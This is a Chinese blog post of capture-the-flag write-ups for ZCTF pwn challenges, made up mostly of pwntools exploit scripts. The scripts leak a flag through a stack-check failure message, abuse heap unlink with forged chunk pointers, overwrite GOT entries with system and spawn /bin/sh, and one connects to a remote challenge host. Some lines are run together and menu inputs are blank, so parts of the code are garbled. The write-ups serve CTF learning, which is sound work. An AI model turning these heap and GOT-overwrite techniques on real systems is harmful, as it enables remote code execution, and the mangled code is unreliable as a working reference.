版权声明:本文为博主原创文章,未经博主允许不得转载。
最近有了点时间,把ZCTF的pwn总结了下,就差最后一个pwn500,另找时间总结。
文件打包:http://files.cnblogs.com/files/wangaohui/attach.zip
Pwn100
很明显栈溢出,但是有canary保护。但是明显的是flag已经被读入了内存。在网上找到了dragonsector写的一个pdf,知道了当__stack_check_fail时,会打印出正在运行中程序的名称,如下:
所以,我们只要将__libc_argv[0]覆盖为flag的地址就能将flag打印出来。POC:
from pwn import *
#context.log_level = 'debug'
s = remote('115.28.206.86',22222)
s.recvuntil('please guess the flag:')
payload='ZCTF{'+'A'*(32-5) + '\x00' + 'a'*263 + p64(0x6010C5)
s.sendline(payload)
s.recvuntil('***: ')
flagt = s.recvuntil('\n')[:27]
flag = 'ZCTF{'
for i in flagt:
flag += chr(ord(i)^ord('A'))
print flag
s.close()
Pwn200-note1
from pwn import *
#context.log_level = 'debug'
io = remote('127.0.0.1',10001)
def new(title, typ, content):
io.recvuntil('Enter the title:')
io.sendline(title)
io.recvuntil('Enter the type:')
io.sendline(typ)
io.recvuntil('Enter the content:')
io.sendline(content)
def show():
io.recvuntil('content=')
io.recvuntil('\n')
io.recvuntil('title=')
leak = io.recvuntil(',')
printfaddr = u64(leak)
print hex(printfaddr)
def edit(title, newc):
io.recvuntil('Input the note title:')
io.sendline(title)
io.recvuntil('Enter the new content:')
io.sendline(newc)
io.recvuntil('Modify success')
def delete(title):
io.recvuntil('Input the note title:')
io.sendline(title)
io.recvuntil('Delete success')
def pwn():
libcstartoff = 0x21A50
systemoff = 0x414F0
io.recvuntil('option--->>')
io.sendline('')
new('','aaa','a1a1')
io.recvuntil('option--->>')
io.sendline('')
new('','aaa','a1a1')
io.recvuntil('option--->>')
io.sendline('')
new('','aaa','a1a1') payload = 'a'*0x100 + p64(0) + p64(0x171) + p64(0x0) + p64(0x602040-0x70) + '' #p64(0x602018)
io.recvuntil('option--->>')
io.sendline('')
edit('', payload) io.recvuntil('option--->>')
io.sendline('')
io.recvuntil('content=')
io.recvuntil('\n')
io.recvuntil('content=')
io.recvuntil('\n')
io.recvuntil('content=')
libcstart = io.recvuntil('\n')[:-1].ljust(8,'\x00')
numlibcstart = u64(libcstart)
print 'leaked libc_start_main addr is %x' % numlibcstart
numsys = numlibcstart - libcstartoff + systemoff io.recvuntil('option--->>')
io.sendline('')
edit('', 'a'*40+p64(numsys)) io.recvuntil('option--->>')
io.sendline('/bin/sh;')
io.interactive()
pwn()
Pwn400-note2
from pwn import *
import time
#context.log_level = 'debug'
def new(s,length,content):
s.sendline('')
s.recvuntil('(less than 128)')
s.sendline(str(length))
s.recvuntil('Input the note content:')
s.sendline(content)
def edit(s,idf,c,content):
s.sendline('')
s.recvuntil('Input the id of the note:')
s.sendline(str(idf))
s.recvuntil('[1.overwrite/2.append]')
s.sendline(str(c))
s.sendline(content)
def dele(s,idf):
s.sendline('')
s.sendline(str(idf))
s.recvuntil('delete note success!')
def infoleak(s,idf):
s.sendline('')
s.recvuntil('Input the id of the note:')
s.sendline(str(idf))
s.recvuntil('Content is ')
return u64(s.recvuntil('\n')[:-1].ljust(8,'\x00'))
s= remote('127.0.0.1',10001)
time.sleep(2)
print 'pid of note2 is :' + str(pwnlib.util.proc.pidof('note2')[0])
raw_input('go!')
s.recvuntil('Input your name:')
s.sendline('wah')
s.recvuntil('Input your address:')
s.sendline('ucas')
s.recvuntil('option--->>') globalptr = 0x602120
fakefd = globalptr - 0x18
fakebk = globalptr - 0x10
content = 'a'*8
content += p64(0x91)
content += p64(fakefd)
content += p64(fakebk)
new(s,0x80,content)
s.recvuntil('option--->>')
new(s,0x0,'a'*8)
s.recvuntil('option--->>')
new(s,0x80,'b'*8)
s.recvuntil('option--->>')
dele(s,1)
s.recvuntil('option--->>') content = 'b'*0x10
content += p64(0xa0)
content += p64(0x90)
new(s,0x0,content)
s.recvuntil('option--->>')
dele(s,2)
s.recvuntil('option--->>')
content = 'a'*0x18 + p64(0x602088)
edit(s,0,1,content)
s.recvuntil('option--->>') atoiaddr = infoleak(s,0)
s.recvuntil('option--->>')
print 'atoi address is ' + hex(atoiaddr)
systemaddr = atoiaddr - 0x36360 + 0x414F0
print 'system address is ' + hex(systemaddr)
content = p64(systemaddr)
edit(s,0,1,content)
s.recvuntil('option--->>')
s.sendline('/bin/sh')
s.interactive()
s.close()
Pwn300-note3
from pwn import *
import time
#context.log_level = 'debug'
def new(s,length,content):
s.sendline('')
s.recvuntil('(less than 1024)')
s.sendline(str(length))
s.recvuntil('Input the note content:')
s.sendline(content)
def edit(s,idf,content):
s.sendline('')
s.recvuntil('Input the id of the note:')
s.sendline(str(idf))
s.recvuntil('Input the new content:')
s.sendline(content)
def dele(s,idf):
s.sendline('')
s.recvuntil('Input the id of the note:')
s.sendline(str(idf))
s.recvuntil('Delete success')
def infoleak(s,idf):
s.sendline('')
s.recvuntil('Input the id of the note:\n')
s.sendline(str(idf))
time.sleep(1)
return u64(s.recvuntil('\n')[:-1].ljust(8,'\x00'))
s= remote('127.0.0.1',10001)
time.sleep(2)
print 'pid of note2 is :' + str(pwnlib.util.proc.pidof('note3')[0])
raw_input('go!')
s.recvuntil('option--->>') globalptr = 0x6020C8
fakefd = globalptr - 0x18
fakebk = globalptr - 0x10
content = 'a'*8
content += p64(0x91)
content += p64(fakefd)
content += p64(fakebk)
new(s,0x80,content)
s.recvuntil('option--->>')
new(s,0x0,'a'*8)
s.recvuntil('option--->>')
new(s,0x80,'b'*8)
s.recvuntil('option--->>')
dele(s,1)
s.recvuntil('option--->>') content = 'b'*0x10
content += p64(0xa0)
content += p64(0x90)
new(s,0x0,content)
s.recvuntil('option--->>')
dele(s,2)
s.recvuntil('option--->>')
content = 'a'*0x18 + p64(0x602018) + p64(0x602020) + p64(0x602070)
edit(s,0,content)
s.recvuntil('option--->>')
content = p64(0x400736)[:-1]
edit(s,0,content)
s.recvuntil('option--->>') putsaddr = infoleak(s,1)
s.recvuntil('option--->>')
print 'puts address is ' + hex(putsaddr)
systemaddr = putsaddr - 0x6B9F0 + 0x414F0
print 'system address is ' + hex(systemaddr)
content = p64(systemaddr)
edit(s,2,content)
s.recvuntil('option--->>')
s.sendline('/bin/sh')
s.interactive()
s.close()
加深了对堆溢出的理解,linux下free时的unlink操作由于有check,并不能达到任意地址写,为了绕过check,能将变量ptr改为&ptr-0x18(64位系统下),&ptr-0xc(32位系统下)。也学到了一个新的泄漏内存的方法,就是如果能达到任意地址写的话,可以将某个.got.plt项(记为函数A)修改为puts在.plt的位置,这样在调用A时,就能调用puts函数造成信息泄露。Note2和note3都是整数溢出+堆溢出(fastbin+dwshoot)。